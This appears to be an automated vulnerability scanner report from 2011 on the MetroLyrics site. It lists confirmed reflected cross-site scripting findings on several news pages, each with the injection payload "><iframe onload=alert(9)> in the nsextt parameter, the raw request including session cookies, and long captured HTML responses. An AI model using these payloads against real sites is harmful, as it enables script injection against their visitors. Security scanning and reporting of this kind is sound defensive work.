<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=hiphop;sz=1x1;ord=1299460605?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=hiphop;sz=728x90;ord=1299460605?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" >Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" >Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" >Rock</a></li>
<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" class="on">Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" >Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" >R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a hre..
- /2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html

/2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html CONFIRMED

http://www.metrolyrics.com/2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html?nsextt=%22..

Parameters

Parameter Type Value
nsextt GET "><iframe onload=alert(9)>

Request

GET /2011-scarlett-johnsson-head-over-heels-for-sean-penn-news.html?nsextt=%22%3E%3Ciframe%20onload=netsparker(9)%3E HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10319
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:20:46 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Scarlett Johnsson &#039;head over heels&#039; for Sean Penn News about Scarlett Johansson" />
<meta name="keywords" content="Scarlett Johnsson &#039;head over heels&#039; for Sean Penn" />
<meta property="fb:page_id" content="81914997331" />
<title>SCARLETT JOHNSSON &#039;HEAD OVER HEELS&#039; FOR SEAN PENN</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Scarlett Johansson","sectionURL":"scarlett-johansson-lyrics.html","title":"Scarlett Johnsson &#039;head over heels&#039; for Sean Penn"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460846?"></script>

<div id="header">

<h1>Scarlett Johnsson &#039;head over heels&#039; for Sean Penn</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460846?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<img src="http://artists.ml-cdn.com/profile/1207681262Scarlett-JohanssonProfile.jpg" alt="Scarlett Johansson" width="166" />
<h2><a href="scarlett-johansson-overview.html" title="Scarlett Johansson Overview">Scarlett Johansson</a></h2>
<p class="addtofav">


<a href="request.php?dothis=become_a_fan&amp;artistid=1207681262" title="Add to My Favorites">Add to My Favorites</a>

</p>
<ul id="artistnav" title="News-int/scarlett-johansson/1207681262/0">
<li><a title="Scarlett Johansson Overview" href="/scarlett-johansson-overview.html" >Overview</a></li>
<li><a title="Scarlett Johansson News" href="/scarlett-johansson-gossip-news.html" >News</a></li>
<li><a title="Scarlett Johansson Awards" href="/scarlett-johansson-awards-featured.html" >Awards</a></li>
<li><a title="Scarlett Johansson Albums" href="/scarlett-johansson-albums-list.html" >Albums</a></li>
<li><a title="Scarlett Johansson Lyrics" href="/scarlett-johansson-lyrics.html" >Lyrics</a></li>
<li><a title="Scarlett Johansson Videos" href="/scarlett-johansson-music-videos.html" >Videos</a></li>
<li><a title="Scarlett Johansson Pictures" href="/scarlett-johansson-pictures.html" >Pictures</a></li>
</ul>
</div>
<div class="module" id="ipod"><script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_160x600;tile=4;sz=160x600;ord=1299460846?"></script></div>
<div class="module"><div id="jqpollwrapper">
<div id="jqpoll">
<div id="jqpollhdr"><h4><span class="icoPoll">&nbsp;</span>Poll</h4></div>
<div id="jqpollbody">
<p>Have you downloaded our i..
- /2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html

/2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html CONFIRMED

http://www.metrolyrics.com/2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html?nsextt=%22%3E..

Parameters

Parameter Type Value
nsextt GET "><iframe onload=alert(9)>

Request

GET /2011-lionel-richie-in-tears-as-he-traces-ancestry-news.html?nsextt=%22%3E%3Ciframe%20onload=netsparker(9)%3E HTTP/1.1
Referer: http://www.metrolyrics.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 10518
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:20:47 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="Lionel Richie in tears as he traces ancestry News about Lionel Richie" />
<meta name="keywords" content="Lionel Richie in tears as he traces ancestry" />
<meta property="fb:page_id" content="81914997331" />
<title>LIONEL RICHIE IN TEARS AS HE TRACES ANCESTRY</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"news","section":"Lionel Richie","sectionURL":"lionel-richie-lyrics.html","title":"Lionel Richie in tears as he traces ancestry"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist_v2_sprite.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460847?"></script>

<div id="header">

<h1>Lionel Richie in tears as he traces ancestry</h1>

